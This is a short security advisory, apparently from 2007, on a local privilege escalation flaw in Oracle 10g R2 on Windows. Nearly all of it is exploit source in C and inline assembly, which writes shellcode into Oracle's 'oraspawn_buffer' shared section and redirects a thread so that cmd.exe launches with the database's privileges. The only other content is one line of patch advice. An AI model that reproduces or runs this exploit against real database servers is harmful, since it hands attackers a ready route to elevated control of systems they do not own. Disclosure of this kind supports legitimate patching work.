Local Privilege Escalation in Oracle 10g R2
Details The following exploit code allows local privilege escalation on Windows. To run this exploit you must have a local shell on the database server. Example #include #include BOOL InjectShellcode(DWORD oldEIP,CHAR * oSID) { HMODULE hKernel; FARPROC pCreateProc; LPSTR sCommand="cmd.exe"; DWORD dwStrLen; CHAR buff[100]; dwStrLen=strlen(sCommand); hKernel=LoadLibrary("Kernel32.dll"); pCreateProc=GetProcAddress(hKernel,"CreateProcessA"); strcpy(buff, "Global\\*oraspawn_buffer_"); strncat(buff, oSID,50); strcat(buff, "*"); HANDLE hMapFile = OpenFileMapping(FILE_MAP_WRITE, FALSE,buff); if (hMapFile == NULL) { printf("Could not open Shared Section\n\n"); return FALSE; } else printf("Shared Section opened\n"); LPVOID lpMapAddress = MapViewOfFile(hMapFile, FILE_MAP_WRITE,0,0,0); printf("Inserting shellcode...\n"); CHAR sWinSta[]="WinSta0\\Default"; //copy shellcode _asm { pushad lea esi, Shellcode mov edi, lpMapAddress add edi, 0x500 lea ecx, End sub ecx, esi push esi push edi cld rep movsb pop edi pop esi push edi lea ecx, CommandBuf sub ecx, esi add edi, ecx mov esi, sCommand mov ecx, dwStrLen rep movsb mov [edi], 0x00 pop edi mov esi, pCreateProc mov [edi+0x0a], esi mov esi, oldEIP mov [edi+0x0e], esi add edi, 0x2f0 lea esi, sWinSta mov ecx, 0xf cld rep movsb jmp Done Shellcode: jmp Start // this gets overwritten mov ax,0xffff mov ax,0xffff mov ax,0xffff mov ax,0xffff CommandBuf: // this gets overwritten mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555 Start: call getDelta getDelta: pop edx // Get shellcode/shared section pointer pushad mov eax, edx add eax, 0x200 push eax //LPPROCESS_INFORMATION add eax, 0x200 mov ebx, edx xor bl, bl lea ecx, [ebx+0x2f0] lea ebx, [eax+0x8] mov [ebx], ecx 
//set windows station and desktop push eax //LPSTARTUPINFO push 0x0 push 0x0 push 0x0 push 0x0 push 0x0 push 0x0 lea eax, [edx-0x47] push eax // Command offset push 0x0 call [edx-0x4f] // Call create process popad push [edx-0x4b] // old thread EIP ret End: Patch Information Apply the patches mentioned in Oracle Critical Patch Update July 2006. © 2007 by Red-Database-Security GmbH - 25-mar-2007 |